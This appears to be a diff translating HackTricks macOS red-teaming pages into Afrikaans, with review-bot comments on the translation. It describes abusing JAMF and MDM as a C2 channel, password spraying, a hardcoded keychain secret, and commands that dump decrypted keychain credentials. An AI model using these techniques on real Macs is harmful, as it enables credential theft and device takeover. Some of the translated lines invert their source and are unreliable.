-## Abusing MDMs +## MDM-misbruik * JAMF Pro: `jamf checkJSSConnection` * Kandji -If you manage to **compromise admin credentials** to access the management platform, you can **potentially compromise all the computers** by distributing your malware in the machines. +As jy daarin slaag om **administratiewe legitimasie te kompromitteer** om toegang tot die bestuursplatform te verkry, kan jy **moontlik alle rekenaars kompromitteer** deur jou kwaadwillige sagteware op die masjiene te versprei. -For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work: +Vir rooi-spanning in MacOS-omgewings word dit sterk aanbeveel om 'n basiese begrip van hoe die MDM's werk te hê: {% content-ref url="macos-mdm/" %} [macos-mdm](macos-mdm/) {% endcontent-ref %} -### Using MDM as a C2 +### MDM gebruik as 'n C2 -A MDM will have permission to install, query or remove profiles, install applications, create local admin accounts, set firmware password, change the FileVault key... +'n MDM het toestemming om profiele te installeer, navrae te doen of te verwyder, programme te installeer, plaaslike administrateursrekeninge te skep, firmware-wagwoord te stel, die FileVault-sleutel te verander... -In order to run your own MDM you need to **your CSR signed by a vendor** which you could try to get with [**https://mdmcert.download/**](https://mdmcert.download/). And to run your own MDM for Apple devices you could use [**MicroMDM**](https://github.com/micromdm/micromdm). +Om jou eie MDM te laat loop, moet jy **jou CSR deur 'n verskaffer laat onderteken** wat jy kan probeer kry met [**https://mdmcert.download/**](https://mdmcert.download/). En om jou eie MDM vir Apple-toestelle te laat loop, kan jy [**MicroMDM**](https://github.com/micromdm/micromdm) gebruik. -However, to install an application in an enrolled device, you still need it to be signed by a developer account... 
however, upon MDM enrolment the **device adds the SSL cert of the MDM as a trusted CA**, so you can now sign anything. +Om egter 'n toepassing op 'n ingeskryfde toestel te installeer, moet dit steeds deur 'n ontwikkelaarsrekening onderteken word... maar met MDM-inskrywing voeg die **toestel die SSL-sertifikaat van die MDM as 'n vertroude CA by**, sodat jy nou enigiets kan onderteken. -To enrol the device in a MDM you. need to install a **`mobileconfig`** file as root, which could be delivered via a **pkg** file (you could compress it in zip and when downloaded from safari it will be decompressed). +Om die toestel in 'n MDM in te skryf, moet jy 'n **`mobileconfig`**-lêer as root installeer, wat afgelewer kan word deur 'n **pkg**-lêer (jy kan dit in 'n zip-komprimeer en wanneer dit vanaf Safari afgelaai word, sal dit gedekomprimeer word). -**Mythic agent Orthrus** uses this technique. +**Mythic-agent Orthrus** gebruik hierdie tegniek. -### Abusing JAMF PRO +### JAMF PRO-misbruik -JAMF can run **custom scripts** (scripts developed by the sysadmin), **native payloads** (local account creation, set EFI password, file/process monitoring...) and **MDM** (device configurations, device certificates...). +JAMF kan **aangepaste skripte** (skripte wat deur die stelseladministrateur ontwikkel is), **inheemse ladinge** (skep van plaaslike rekeninge, stel EFI-wagwoord, lêer-/prosesmonitering...) en **MDM** (toestelkonfigurasies, toestelsertifikate...) uitvoer. -#### JAMF self-enrolment +#### JAMF selfinskrywing -Go to a page such as `https://.jamfcloud.com/enroll/` to see if they have **self-enrolment enabled**. If they have it might **ask for credentials to access**. +Gaan na 'n bladsy soos `https://.jamfcloud.com/enroll/` om te sien of hulle **selfinskrywing geaktiveer** het. As hulle dit het, kan dit **vra vir legitimasie om toegang te verkry**. 
-You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) to perform a password spraying attack. +Jy kan die skrip [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) gebruik om 'n wagwoordspuitaanval uit te voer. -Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form: +Verder, nadat jy die regte legitimasie gevind het, kan jy moontlik ander gebruikersname met die volgende vorm deur kragtige kragtige aanvalle aanval: ![](<../../.gitbook/assets/image (7) (1) (1).png>) -#### JAMF device Authentication +#### JAMF-toestelverifikasie
-The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\ -Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** +Die **`jamf`** binêre lêer bevat die geheim om die sleutelketting oop te maak wat op daardie tydstip **gedeel** was onder almal en dit was: **`jk23ucnq91jfu9aj`**.\ +Verder volharder jamf as 'n **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** -#### JAMF Device Takeover +#### JAMF-toesteloorgawe -The **JSS** (Jamf Software Server) **URL** that **`jamf`** will use is located in **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\ -This file basically contains the URL: +Die **JSS** (Jamf Software Server) **URL** wat **`jamf`** sal gebruik, is geleë in **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\ +Hierdie lêer bevat basies die URL: {% code overflow="wrap" %} ```bash plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist [...] - is_virtual_machine - - jss_url - https://halbornasd.jamfcloud.com/ - last_management_framework_change_id - 4 +is_virtual_machine + +jss_url +https://halbornasd.jamfcloud.com/ +last_management_framework_change_id +4 [...] ``` {% endcode %} -So, an attacker could drop a malicious package (`pkg`) that **overwrites this file** when installed setting the **URL to a Mythic C2 listener from a Typhon agent** to now be able to abuse JAMF as C2. - -{% code overflow="wrap" %} +So, 'n aanvaller kan 'n skadelike pakkie (`pkg`) laat val wat **hierdie lêer oorskryf** wanneer dit geïnstalleer word en die **URL instel op 'n Mythic C2 luisteraar van 'n Typhon-agent** om nou JAMF te misbruik as C2. ```bash # After changing the URL you could wait for it to be reloaded or execute: sudo jamf policy -id 0 
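Review bot: the `plutil -convert xml1` output block in this hunk is modified rather than translated: the `- is_virtual_machine` / `+is_virtual_machine`, `jss_url` and `last_management_framework_change_id` pairs differ only in the leading whitespace that was stripped, and the `{% code overflow="wrap" %}` opener before the `sudo jamf policy -id 0` block is deleted while no matching removal of its `{% endcode %}` is visible in the hunk, which leaves an unbalanced template tag. Restore the original indentation inside the fence and keep both `{% code %}`/`{% endcode %}` lines (or drop both). In the prose, "deur kragtige kragtige aanvalle aanval" duplicates a word and loses "brute-force"; suggest "met brute force probeer". "Verder volharder jamf as 'n LaunchDaemon" uses a non-word; suggest "Verder bly jamf voortbestaan as 'n LaunchDaemon". "rooi-spanning" for "red teaming" is not used elsewhere in this patch (later hunks keep "Red Teaming"); pick one term. The support footer at the top of this hunk ("hacktruuks", "github-repos") recurs in every file of the patch with variant spellings ("haktruuks", "github-opslag"); it should be identical everywhere.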
@@ -93,34 +91,34 @@ sudo jamf policy -id 0 #### JAMF Impersonation -In order to **impersonate the communication** between a device and JMF you need: +Om die kommunikasie tussen 'n toestel en JMF na te boots, benodig jy die volgende: -* The **UUID** of the device: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` -* The **JAMF keychain** from: `/Library/Application\ Support/Jamf/JAMF.keychain` which contains the device certificate +* Die **UUID** van die toestel: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` +* Die **JAMF-sleutelbos** vanaf: `/Library/Application\ Support/Jamf/JAMF.keychain` wat die toestelsertifikaat bevat -With this information, **create a VM** with the **stolen** Hardware **UUID** and with **SIP disabled**, drop the **JAMF keychain,** **hook** the Jamf **agent** and steal its information. +Met hierdie inligting, **skep 'n VM** met die **gesteelde** Hardeware **UUID** en met **SIP gedeaktiveer**, laat die **JAMF-sleutelbos val**, **haak** die Jamf **agent** en steel sy inligting. -#### Secrets stealing +#### Geheimhouding steel


-You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**. +Jy kan ook die ligging `/Library/Application Support/Jamf/tmp/` monitor vir die **aangepaste skripte** wat administrateurs dalk wil uitvoer via Jamf aangesien hulle hier **geplaas, uitgevoer en verwyder** word. Hierdie skripte **kan geloofsbriewe bevat**. -However, **credentials** might be passed tho these scripts as **parameters**, so you would need to monitor `ps aux | grep -i jamf` (without even being root). +Nietemin, **geloofsbriewe** kan aan hierdie skripte oorgedra word as **parameters**, dus sal jy `ps aux | grep -i jamf` moet monitor (sonder om selfs root te wees). -The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) can listen for new files being added and new process arguments. +Die skrip [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) kan luister vir nuwe lêers wat bygevoeg word en nuwe prosesargumente. -### macOS Remote Access +### macOS Afstandsbediening -And also about **MacOS** "special" **network** **protocols**: +En ook oor **MacOS** "spesiale" **netwerkprotokolle**: {% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %} [macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md) {% endcontent-ref %} -## Active Directory +## Aktiewe Gids -In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages: +In sommige gevalle sal jy vind dat die **MacOS-rekenaar aan 'n AD gekoppel is**. In hierdie scenario moet jy probeer om die aktiewe gids soos jy gewoond is te **opnoem**. 
Vind 'n bietjie **hulp** in die volgende bladsye: {% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %} [pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md) 
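Review bot: the `#### Secrets stealing` heading is rendered as "Geheimhouding steel", which means "stealing secrecy"; it should be "Geheime steel" (or "Steel van geheime"). The sibling heading `#### JAMF Impersonation` at the top of the hunk is left in English while every other heading in the section is translated, and "JMF" in both the old and new line below it is presumably "JAMF". "## Aktiewe Gids" translates the product name Active Directory, which the tool descriptions in the next hunk keep as "Active Directory"; keep the proper name untranslated so the page stays searchable. "### macOS Afstandsbediening" means "remote control"; "Afstandtoegang" matches "Remote Access". "geloofsbriewe" is used here for "credentials" where the previous hunk used "legitimasie"; use one term.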
@@ -134,41 +132,36 @@ In some occasions you will find that the **MacOS computer is connected to an AD* [pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/) {% endcontent-ref %} -Some **local MacOS tool** that may also help you is `dscl`: - +Sommige **plaaslike MacOS-hulpmiddels** wat jou ook kan help, is `dscl`: ```bash dscl "/Active Directory/[Domain]/All Domains" ls / ``` +Daar is ook 'n paar gereedgemaakte hulpmiddels vir MacOS om outomaties die AD te ondersoek en met kerberos te speel: -Also there are some tools prepared for MacOS to automatically enumerate the AD and play with kerberos: - -* [**Machound**](https://github.com/XMCyber/MacHound): MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of Active Directory relationships on MacOS hosts. -* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. -* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. - -### Domain Information +* [**Machound**](https://github.com/XMCyber/MacHound): MacHound is 'n uitbreiding van die Bloodhound ouditeringshulpmiddel wat die insameling en opname van Active Directory-verhoudings op MacOS-gashere moontlik maak. +* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is 'n Objective-C-projek wat ontwerp is om met die Heimdal krb5 API's op macOS te kommunikeer. Die doel van die projek is om beter sekuriteitstoetsing rondom Kerberos op macOS-toestelle moontlik te maak deur gebruik te maak van inheemse API's sonder om enige ander raamwerk of pakkette op die teiken te vereis. 
+* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript vir Automatisering (JXA) hulpmiddel vir Active Directory-ondersoek. +### Domein Inligting ```bash echo show com.apple.opendirectoryd.ActiveDirectory | scutil ``` +### Gebruikers -### Users +Die drie tipes MacOS-gebruikers is: -The three types of MacOS users are: +* **Plaaslike Gebruikers** - Bestuur deur die plaaslike OpenDirectory-diens, hulle is op geen manier gekoppel aan die Aktiewe Gids nie. +* **Netwerkgebruikers** - Vlugtige Aktiewe Gids-gebruikers wat 'n verbinding met die DC-bediener benodig om te verifieer. +* **Mobiele Gebruikers** - Aktiewe Gids-gebruikers met 'n plaaslike rugsteun vir hul geloofsbriewe en lêers. -* **Local Users** — Managed by the local OpenDirectory service, they aren’t connected in any way to the Active Directory. -* **Network Users** — Volatile Active Directory users who require a connection to the DC server to authenticate. -* **Mobile Users** — Active Directory users with a local backup for their credentials and files. +Die plaaslike inligting oor gebruikers en groepe word gestoor in die map _/var/db/dslocal/nodes/Default._\ +Byvoorbeeld, die inligting oor 'n gebruiker genaamd _mark_ word gestoor in _/var/db/dslocal/nodes/Default/users/mark.plist_ en die inligting oor die groep _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_. -The local information about users and groups is stored in in the folder _/var/db/dslocal/nodes/Default._\ -For example, the info about user called _mark_ is stored in _/var/db/dslocal/nodes/Default/users/mark.plist_ and the info about the group _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_. 
- -In addition to using the HasSession and AdminTo edges, **MacHound adds three new edges** to the Bloodhound database: - -* **CanSSH** - entity allowed to SSH to host -* **CanVNC** - entity allowed to VNC to host -* **CanAE** - entity allowed to execute AppleEvent scripts on host +Bo en behalwe die gebruik van die HasSession en AdminTo-lyne, **voeg MacHound drie nuwe lyne by** tot die Bloodhound-databasis: +* **CanSSH** - entiteit wat toegelaat word om SSH na gasheer te maak +* **CanVNC** - entiteit wat toegelaat word om VNC na gasheer te maak +* **CanAE** - entiteit wat toegelaat word om AppleEvent-skripsies op gasheer uit te voer ```bash #User enumeration dscl . ls /Users 
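Review bot: "AppleEvent-skripsies" in the `CanAE` bullet means "AppleEvent dissertations"; "skripte" is the word for scripts and is what the rest of this patch uses. The hunk also removes the blank lines around the `dscl` fence, before `### Domein Inligting` and `### Gebruikers`, and between the `CanAE` bullet and the following ```bash fence; a fence placed directly after a list item can be parsed as a continuation of that item, and none of these removals is needed for the translation (the hunk header shows 41 lines shrinking to 36). Keep the original spacing so the diff contains only translated text. "Sommige plaaslike MacOS-hulpmiddels wat jou ook kan help, is `dscl`" pairs a plural subject with a single tool; "'n Plaaslike MacOS-hulpmiddel wat ook kan help, is `dscl`" matches the source. "Aktiewe Gids" appears again for Active Directory while the Machound, Bifrost and Orchard descriptions in the same hunk keep "Active Directory".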
@@ -190,30 +183,29 @@ dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]" #Domain Information dsconfigad -show ``` +Meer inligting in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) -More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) +## Toegang tot die Sleutelbos -## Accessing the Keychain - -The Keychain highly probably contains sensitive information that if accessed withuot generating a prompt could help to move forward a red team exercise: +Die Sleutelbos bevat hoogstwaarskynlik sensitiewe inligting wat, as dit sonder 'n vraag gegenereer word, kan help om 'n rooi-span-oefening voort te sit: {% content-ref url="macos-keychain.md" %} [macos-keychain.md](macos-keychain.md) {% endcontent-ref %} -## External Services +## Eksterne Dienste -MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin. +MacOS Red Teaming verskil van 'n gewone Windows Red Teaming omdat gewoonlik **MacOS geïntegreer is met verskeie eksterne platforms direk**. 'n Gewone konfigurasie van MacOS is om toegang tot die rekenaar te verkry deur gebruik te maak van **OneLogin-gesinkroniseerde geloofsbriewe en toegang tot verskeie eksterne dienste** (soos github, aws...) via OneLogin. -## Misc Red Team techniques +## Verskeie Red Team-tegnieke ### Safari -When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. 
So for example, if you **download a zip**, it will be automatically decompressed: +Wanneer 'n lêer in Safari afgelaai word, sal dit as dit 'n "veilige" lêer is, **outomaties oopgemaak** word. So byvoorbeeld, as jy 'n zip aflaai, sal dit outomaties gedekomprimeer word:
-## References +## Verwysings * [**https://www.youtube.com/watch?v=IiMladUbL6E**](https://www.youtube.com/watch?v=IiMladUbL6E) * [**https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6**](https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6) @@ -223,14 +215,14 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
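Review bot: in the `## Toegang tot die Sleutelbos` hunk above, "sensitiewe inligting wat, as dit sonder 'n vraag gegenereer word, kan help" inverts the source: the English says the information helps if it can be accessed without generating a prompt, whereas the Afrikaans says the information itself is generated without a question. Suggest "sensitiewe inligting wat, as dit verkry kan word sonder om 'n prompt te veroorsaak, kan help om ...". "Sleutelbos" is used for keychain here and in the headings, but the API section of the keychain page in this same patch uses "sleutelketting"; settle on one. "MacOS Red Teaming" is kept in English here while the first hunk uses "rooi-spanning".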
diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md index ba70c4c90..7e72788e7 100644 --- a/macos-hardening/macos-red-teaming/macos-keychain.md +++ b/macos-hardening/macos-red-teaming/macos-keychain.md @@ -1,72 +1,71 @@ -# macOS Keychain +# macOS Sleutelbos
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Main Keychains +## Hoof Sleutelbosse -* The **User Keychain** (`~/Library/Keychains/login.keycahin-db`), which is used to store **user-specific credentials** like application passwords, internet passwords, user-generated certificates, network passwords, and user-generated public/private keys. -* The **System Keychain** (`/Library/Keychains/System.keychain`), which stores **system-wide credentials** such as WiFi passwords, system root certificates, system private keys, and system application passwords. +* Die **Gebruiker Sleutelbos** (`~/Library/Keychains/login.keycahin-db`), wat gebruik word om **gebruikerspesifieke geloofsbriewe** soos toepassingswagwoorde, internetwagwoorde, gebruikers gegenereerde sertifikate, netwerkwagwoorde en gebruikers gegenereerde openbare/privaat sleutels te stoor. +* Die **Stelsel Sleutelbos** (`/Library/Keychains/System.keychain`), wat **stelselwye geloofsbriewe** soos WiFi-wagwoorde, stelsel-rootsertifikate, stelsel private sleutels en stelseltoepassingswagwoorde stoor. -### Password Keychain Access +### Toegang tot Sleutelbos Wagwoorde -These files, while they do not have inherent protection and can be **downloaded**, are encrypted and require the **user's plaintext password to be decrypted**. A tool like [**Chainbreaker**](https://github.com/n0fate/chainbreaker) could be used for decryption. +Hierdie lêers, alhoewel hulle nie inherente beskerming het en **afgelaai** kan word nie, is versleutel en vereis die **gebruiker se platte tekst wagwoord om ontsluit** te word. 'n Hulpmiddel soos [**Chainbreaker**](https://github.com/n0fate/chainbreaker) kan gebruik word vir ontsleuteling. 
-## Keychain Entries Protections +## Sleutelbosinskrywingsbeskerming -### ACLs +### ACL's -Each entry in the keychain is governed by **Access Control Lists (ACLs)** which dictate who can perform various actions on the keychain entry, including: +Elke inskrywing in die sleutelbos word beheer deur **Toegangsbeheerlyste (ACL's)** wat bepaal wie verskeie aksies op die sleutelbosinskrywing kan uitvoer, insluitend: -* **ACLAuhtorizationExportClear**: Allows the holder to get the clear text of the secret. -* **ACLAuhtorizationExportWrapped**: Allows the holder to get the clear text encrypted with another provided password. -* **ACLAuhtorizationAny**: Allows the holder to perform any action. +* **ACLAuhtorizationExportClear**: Laat die houer toe om die geheime teks te kry. +* **ACLAuhtorizationExportWrapped**: Laat die houer toe om die geheime teks versleutel met 'n ander voorsiene wagwoord te kry. +* **ACLAuhtorizationAny**: Laat die houer toe om enige aksie uit te voer. -The ACLs are further accompanied by a **list of trusted applications** that can perform these actions without prompting. This could be: +Die ACL's word verder vergesel deur 'n **lys van vertroude toepassings** wat hierdie aksies sonder 'n versoek kan uitvoer. Dit kan wees: -* **N`il`** (no authorization required, **everyone is trusted**) -* An **empty** list (**nobody** is trusted) -* **List** of specific **applications**. +* **N`il`** (geen toestemming vereis, **almal is vertrou**) +* 'n **Leë** lys (**niemand** is vertrou) +* **Lys** van spesifieke **toepassings**. -Also the entry might contain the key **`ACLAuthorizationPartitionID`,** which is use to identify the **teamid, apple,** and **cdhash.** +Die inskrywing kan ook die sleutel **`ACLAuthorizationPartitionID`** bevat, wat gebruik word om die **teamid, apple,** en **cdhash** te identifiseer. -* If the **teamid** is specified, then in order to **access the entry** value **withuot** a **prompt** the used application must have the **same teamid**. 
-* If the **apple** is specified, then the app needs to be **signed** by **Apple**. -* If the **cdhash** is indicated, then **app** must have the specific **cdhash**. +* As die **teamid** gespesifiseer is, moet die gebruikte toepassing dieselfde **teamid** hê om toegang tot die inskrywingwaarde **sonder** 'n versoek te verkry. +* As die **apple** aangedui is, moet die toepassing deur **Apple** onderteken word. +* As die **cdhash** aangedui word, moet die toepassing die spesifieke **cdhash** hê. -### Creating a Keychain Entry +### Die Skep van 'n Sleutelbosinskrywing -When a **new** **entry** is created using **`Keychain Access.app`**, the following rules apply: +Wanneer 'n **nuwe** **inskrywing** geskep word met behulp van **`Keychain Access.app`**, geld die volgende reëls: -* All apps can encrypt. -* **No apps** can export/decrypt (without prompting the user). -* All apps can see the integrity check. -* No apps can change ACLs. -* The **partitionID** is set to **`apple`**. +* Alle toepassings kan versleutel. +* **Geen toepassings** kan uitvoer/ontsleutel nie (sonder om die gebruiker te versoek). +* Alle toepassings kan die integriteitskontrole sien. +* Geen toepassings kan ACL's verander nie. +* Die **partitionID** word ingestel op **`apple`**. -When an **application creates an entry in the keychain**, the rules are slightly different: +Wanneer 'n **toepassing 'n inskrywing in die sleutelbos skep**, is die reëls effens anders: -* All apps can encrypt. -* Only the **creating application** (or any other apps explicitly added) can export/decrypt (without prompting the user). -* All apps can see the integrity check. -* No apps can change the ACLs. -* The **partitionID** is set to **`teamid:[teamID here]`**. +* Alle toepassings kan versleutel. +* Slegs die **skeppende toepassing** (of enige ander toepassings wat eksplisiet bygevoeg is) kan uitvoer/ontsleutel (sonder om die gebruiker te versoek). +* Alle toepassings kan die integriteitskontrole sien. 
+* Geen toepassings kan ACL's verander nie. +* Die **partitionID** word ingestel op **`teamid:[teamID hier]`**. -## Accessing the Keychain +## Toegang tot die Sleutelbos ### `security` - ```bash # Dump all metadata and decrypted secrets (a lot of pop-ups) security dump-keychain -a -d 
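Review bot: "alhoewel hulle nie inherente beskerming het en afgelaai kan word nie" wraps both clauses in the Afrikaans double negative, so it reads "although they have no inherent protection and cannot be downloaded", the opposite of the source's "can be downloaded". Suggest "alhoewel hulle geen inherente beskerming het nie en afgelaai kan word, is hulle versleutel en vereis ...". While this line is being touched, the path in the `login.keycahin-db` code span is misspelt in both the old and new line; the file is `~/Library/Keychains/login.keychain-db`. The `ACLAuhtorizationExportClear` bullet drops "clear text": "Laat die houer toe om die geheim in skoonteks te kry". The blank line between `### security` and the ```bash fence is removed for no reason (hunk header 72 to 71 lines).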
@@ -77,73 +76,72 @@ security find-generic-password -a "Slack" -g # Change the specified entrys PartitionID entry security set-generic-password-parition-list -s "test service" -a "test acount" -S ``` - ### APIs {% hint style="success" %} -The **keychain enumeration and dumping** of secrets that **won't generate a prompt** can be done with the tool [**LockSmith**](https://github.com/its-a-feature/LockSmith) +Die **sleutelketting enumerasie en dump** van geheime wat **nie 'n vraag sal genereer** nie, kan gedoen word met die instrument [**LockSmith**](https://github.com/its-a-feature/LockSmith) {% endhint %} -List and get **info** about each keychain entry: +Lys en kry **inligting** oor elke sleutelkettinginskrywing: -* The API **`SecItemCopyMatching`** gives info about each entry and there are some attributes you can set when using it: - * **`kSecReturnData`**: If true, it will try to decrypt the data (set to false to avoid potential pop-ups) - * **`kSecReturnRef`**: Get also reference to keychain item (set to true in case later you see you can decrypt without pop-up) - * **`kSecReturnAttributes`**: Get metadata about entries - * **`kSecMatchLimit`**: How many results to return - * **`kSecClass`**: What kind of keychain entry +* Die API **`SecItemCopyMatching`** gee inligting oor elke inskrywing en daar is sekere eienskappe wat jy kan instel wanneer jy dit gebruik: +* **`kSecReturnData`**: As waar, sal dit probeer om die data te ontsluit (stel dit in as vals om potensiële opduikende vensters te vermy) +* **`kSecReturnRef`**: Kry ook verwysing na sleutelkettingitem (stel dit in as waar in die geval dat jy sien jy kan ontsluit sonder opduikende venster) +* **`kSecReturnAttributes`**: Kry metadata oor inskrywings +* **`kSecMatchLimit`**: Hoeveel resultate om terug te gee +* **`kSecClass`**: Watter soort sleutelkettinginskrywing -Get **ACLs** of each entry: +Kry **ACL's** van elke inskrywing: -* With the API **`SecAccessCopyACLList`** you can get the **ACL for the 
keychain item**, and it will return a list of ACLs (like `ACLAuhtorizationExportClear` and the others previously mentioned) where each list has: - * Description - * **Trusted Application List**. This could be: - * An app: /Applications/Slack.app - * A binary: /usr/libexec/airportd - * A group: group://AirPort +* Met die API **`SecAccessCopyACLList`** kan jy die **ACL vir die sleutelkettingitem** kry, en dit sal 'n lys van ACL's teruggee (soos `ACLAuhtorizationExportClear` en die ander voorheen genoemde) waar elke lys het: +* Beskrywing +* **Vertroude Aansoeklys**. Dit kan wees: +* 'n Toepassing: /Applications/Slack.app +* 'n Binêre: /usr/libexec/airportd +* 'n Groep: group://AirPort -Export the data: +Voer die data uit: -* The API **`SecKeychainItemCopyContent`** gets the plaintext -* The API **`SecItemExport`** exports the keys and certificates but might have to set passwords to export the content encrypted +* Die API **`SecKeychainItemCopyContent`** kry die platte teks +* Die API **`SecItemExport`** voer die sleutels en sertifikate uit, maar moontlik moet wagwoorde gestel word om die inhoud versleutel uit te voer -And these are the **requirements** to be able to **export a secret without a prompt**: +En hier is die **vereistes** om 'n geheim sonder 'n vraag uit te voer: -* If **1+ trusted** apps listed: - * Need the appropriate **authorizations** (**`Nil`**, or be **part** of the allowed list of apps in the authorization to access the secret info) - * Need code signature to match **PartitionID** - * Need code signature to match that of one **trusted app** (or be a member of the right KeychainAccessGroup) -* If **all applications trusted**: - * Need the appropriate **authorizations** - * Need code signature to match **PartitionID** - * If **no PartitionID**, then this isn't needed +* As daar **1+ vertroude** programme gelys word: +* Benodig die toepaslike **magtigings** (**`Nil`**, of wees deel van die toegelate lys van programme in die magtiging om toegang tot 
